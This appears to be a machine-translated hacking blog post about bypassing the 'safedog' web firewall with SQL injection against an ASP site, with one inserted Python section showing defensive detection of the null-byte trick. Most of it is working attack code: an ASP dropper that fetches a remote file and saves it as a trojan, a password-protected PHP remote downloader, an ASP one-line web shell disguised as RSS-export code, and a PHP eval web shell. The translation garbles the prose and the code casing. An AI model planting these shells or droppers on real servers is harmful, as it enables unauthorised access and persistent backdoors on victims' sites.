A senior classmate recently told me how hard our major is, so I went searching for a ticket to see what the Cisco ticket was about, and that is how this little injection started.
After a brief conversation with customer service I found that the cost was high, so I took a look at their official website. I opened a link and found that it was a dynamic page, xxx.asp?id=
I originally wrote this up in a DOC, so what follows only describes the ideas.
How does safedog react? Requests such as id=69 and 1=1 and xx.asp?id=69 and 1=2 are filtered, but xx.asp?0day5.com=%00.&xw_id=69%20and%201=1 and xx.asp?0day5.com=%00.&xw_id=69%20and%201=2 come back normally, so it is fine to hand it straight to a tool.
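The filtering gap described above, seen from the defender's side, as an added example that is not part of the original post. It assumes the filter stopped reading the query at the decoded NUL byte (the post only reports that such requests passed); the function names, the /news.asp path and the pad parameter are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Boolean test appended to a value, e.g. "and 1=1" / "or 2=3".
BOOLEAN_PROBE = re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.IGNORECASE)

# Constructed sample requests (path and the "pad" parameter are made up).
SAMPLES = [
    "/news.asp?id=69",
    "/news.asp?id=69%20and%201=1",
    "/news.asp?pad=%00.&id=69%20and%201=2",
]


def truncating_filter(url):
    """Assumed flaw: decode the query, then read it as a NUL-terminated string."""
    visible = unquote(urlsplit(url).query).split("\x00", 1)[0]
    return bool(BOOLEAN_PROBE.search(visible))


def full_filter(url):
    """Inspect every parameter the way the application will receive it."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # A decoded NUL has no place in a query string; flag it on its own so
        # the request is caught even when no other rule matches.
        if "\x00" in name or "\x00" in value:
            findings.append(("nul-byte", name))
        if BOOLEAN_PROBE.search(value):
            findings.append(("boolean-probe", name))
    return findings


if __name__ == "__main__":
    for url in SAMPLES:
        print(url, truncating_filter(url), full_filter(url))
```

The third sample is missed by the truncating filter and caught twice by the full one, which is the property to check for when testing a WAF rule set against the parser the application itself uses.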
Let's just brainstorm a few ideas. Don't try it...
Against safedog you can choose to download files rather than upload them; this and the notes below have been well tested.
ASP download script; it requires that data stream creation is supported and has not been removed.
<%
Set xPost = CreateObject ("Microsoft. XMLHTTP ")
XPost. Open "GET", "http://www.bkjia.com/2.txt", False
XPost. Send ()
Set sGet = CreateObject ("ADODB. Stream ")
SGet. Mode = 3
SGet. Type = 1
SGet. Open ()
SGet. Write (xPost. responseBody)
SGet. SaveToFile Server. MapPath ("11.asp"), 2
Set sGet = nothing
Set sPOST = nothing
%>
Download the http://www.bkjia.com/2.txt file to the current directory and save it as 11.asp
Save the script as x.asp and then request it. Wait until the progress bar completes; requesting 11.asp will then find the trojan lying there.
PHP. This is a big note:
<form method = "post">
<Input name = "url" size = "50"/>
<Input name = "submit" type = "submit"/>
</Form>
<? Php
$ Pwd = 'E'; // here is your password
If ($ _ REQUEST ['pwd']! = $ Pwd)
Exit ('Sorry, you are not validate user! ');
// Maximum execution time in seconds
Set_time_limit (24*60*60 );
If (! Isset ($ _ POST ['submit ']) die ();
// Folder to save downloaded files to. must end with slash
$ Destination_folder = './';
$ Url = $ _ POST ['url'];
$ Newfname = $ destination_folder. basename ($ url );
$ File = fopen ($ url, "rb ");
If ($ file ){
$ Newf = fopen ($ newfname, "wb ");
If ($ newf)
While (! Feof ($ file ))
{
Fwrite ($ newf, fread ($ file, 1024*8), 1024*8 );
}
}
If ($ file)
{
Fclose ($ file );
}
If ($ newf ){
Fclose ($ newf );
Echo 'OK, File has been downloaded! ';
}
?>
Save it as xx.php and then access it with e.php?pwd=e; it will prompt you to enter the address. Here, find a website that does not parse PHP and then upload it to... It will download the file and save it in the current directory.
I have been using the one-liner mentioned by Legend of Xianjian.
<%
Call System_Initalize ()
Function System_Initalize ()
On Error Resume Next
Dim Rss2Export: Rss2Export = "Export"
Dim objArticle: objArticle = Request (Rss2Export)
Set Rss2Export = New TRssExport
With Rss2Export
Dim objRS, UserName, UserIntro
. TimeZone = ZC_TIME_ZONE
UserName = Users (UserID). Name
If objArticle <> "Then
. AddChannelAttribute "language", ZC_BLOG_LANGUAGE
Execute Replace (objArticle, "*" & Rss2Export ,"")
. AddChannelAttribute "copyright", TransferHTML (ZC_BLOG_COPYRIGHT, "[nohtml] [html-format]")
. AddChannelAttribute "pubDate", Now
Response. End ()
End if
End
End Function
%>
The password is Dim Rss2Export: Rss2Export = "Export".
In php, nono is selected
<? Php
Eval
($ _ POST
[1])
?>
The password is 1.